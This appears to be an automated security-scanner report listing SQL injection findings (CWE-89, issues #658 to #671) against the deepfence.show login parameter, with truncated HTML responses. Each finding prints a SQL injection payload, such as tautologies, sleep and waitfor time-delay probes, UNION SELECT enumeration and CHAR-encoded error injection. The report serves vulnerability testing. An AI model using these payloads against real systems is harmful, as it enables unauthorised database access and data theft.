href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@deepfence.io\nCWE-ID CWE-89\nIssue Number #658\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io\" or sleep(5)#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #659\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 8--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #660\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io&&SLEEP(5)#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #661Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io admin\") or \"1\"=\"1\"#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #662\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 6#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #663\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7,8,9,10\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #664\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io\") or true--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #665\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 4\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #666\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io waitfor delay '00:00:05'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #667\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Valuedemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #668\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io\\\\\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@deepfence.io\nCWE-ID CWE-89\nIssue Number #669\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+\nCHAR(88)+CHAR(118)+CHAR(120)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #670\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1,2,3,4,5#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #671\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts 